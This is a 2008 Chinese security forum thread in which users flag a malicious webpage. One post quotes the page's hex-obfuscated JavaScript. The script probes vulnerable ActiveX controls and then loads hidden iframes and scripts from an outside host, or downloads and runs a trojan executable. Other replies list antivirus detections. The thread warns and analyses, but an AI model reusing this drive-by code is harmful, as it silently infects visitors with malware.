这个网页有毒

显示全部楼层 · 发表于 2008-2-13 23:05:11

http://www.591live.cn/tv1725.htm

显示全部楼层 · 发表于 2008-2-13 23:10:04

技术垃圾的不行．．

<script>window.onerror=function(){return true;}</script>
<script>
if(document.cookie.indexOf('OK')==-1){
try{var e;
var ado=(document.createElement("object"));
var Rising="\x63\x6c\x61\x73\x73\x69\x64";
var KV2008="\x41\x64\x6f\x64\x62\x2e\x53\x74\x72\x65\x61\x6d";
var Kaspersky="\x63\x6c\x73\x69\x64\x3a\x42\x44\x39\x36\x43\x35\x35\x36\x2d\x36\x35\x41\x33\x2d\x31\x31\x44\x30\x2d\x39\x38\x33\x41\x2d\x30\x30\x43\x30\x34\x46\x43\x32\x39\x45\x33\x36";
ado.setAttribute(Rising,Kaspersky);
var as=ado.createobject(KV2008,"")}
catch(e){};
finally{
var expires=new Date();
expires.setTime(expires.getTime()+3*60*60*1000);
document.cookie='OK=Yes;path=/;expires='+expires.toGMTString();
if(e!="[object Error]"){
document.write("<script src=http:\/\/user1.3332210.net\/ms06014.js><\/script>")}
else{
try{var f;
var ourgame=new ActiveXObject("\x47\x4c\x43\x48\x41\x54\x2e\x47\x4c\x43\x68\x61\x74\x43\x74\x72\x6c\x2e\x31");}
catch(f){};
finally{if(f!="[object Error]"){
document.write('<iframe style=display:none src="'">http://user1.3332210.net/GLWORLD.html"></iframe>')}}
try{var g;
var storm=new ActiveXObject("\x4d\x50\x53\x2e\x53\x74\x6f\x72\x6d\x50\x6c\x61\x79\x65\x72");}
catch(g){};
finally{if(g!="[object Error]"){
document.write('<iframe style=display:none src="'">http://user1.3332210.net/StormII.html"></iframe>')}}
try{var h;
var Real=new ActiveXObject("\x49\x45\x52\x50\x43\x74\x6c\x2e\x49\x45\x52\x50\x43\x74\x6c\x2e\x31");}
catch(h){};
finally{if(h!="[object Error]"){
document.write('<sCrIpT LAnGuAgE="jAvAsCrIpT" src=http:\/\/user1.3332210.net\/real.js><\/script>')}}
try{var i;
var Baidu=new ActiveXObject("\x42\x61\x69\x64\x75\x42\x61\x72\x2e\x54\x6f\x6f\x6c");}
catch(i){};
finally{if(i!="[object Error]"){
Baidu["\x44\x6c\x6f\x61\x64\x44\x53"]("http://user1.3332210.net/Baidu.cab", "\x42\x61\x69\x64\x75\x2e\x65\x78\x65", 0)}}
if(h=="[object Error]" && g=="[object Error]" && f=="[object Error]" && i=="[object Error]")
{
location.replace("about:blank");}
}}}
</script>

复制代码

http://user1.3332210.net/Baidu.cab

[ 本帖最后由 garyyan456 于 2008-2-13 23:12 编辑 ]

显示全部楼层 · 发表于 2008-2-13 23:11:53

呵呵用FS的飘

显示全部楼层 · 发表于 2008-2-13 23:15:11

原帖由 gho 于 2008-2-13 23:11 发表
呵呵用FS的飘

结果: 发现1个恶意软件
Trojan-Downloader.Win32.Agent.ibl (病毒)

C:\Documents and Settings\GUNDAM\桌面\Baidu.cab\Baidu.exe

显示全部楼层 · 发表于 2008-2-13 23:17:35

Firefox3.0 b3都认识它，

显示全部楼层 · 发表于 2008-2-13 23:23:11

呵呵你也是FS啊我看见没反映就关了

显示全部楼层 · 发表于 2008-2-13 23:47:27

怎么弄的

显示全部楼层 · 发表于 2008-2-13 23:49:43

avast报Win32:Agent-RHJ [Trj]

显示全部楼层 · 发表于 2008-2-13 23:53:49

偶都还没解出来呢．．．．．

显示全部楼层 · 发表于 2008-2-14 00:08:27

Virus or unwanted program 'TR/Dldr.Agent.dyd [TR/Dldr.Agent.dyd]'
detected in file 'C:\TDDOWNLOAD\Baidu.cab.td.
Action performed: Delete file

[已鉴定] 这个网页有毒

回复 4楼 leonfg 的帖子

回复 2楼 garyyan456 的帖子

回复 7楼冷_冷的帖子

[已鉴定] 这个网页有毒

回复 4楼 leonfg 的帖子

回复 2楼 garyyan456 的帖子

回复 7楼 冷_冷 的帖子

回复 7楼冷_冷的帖子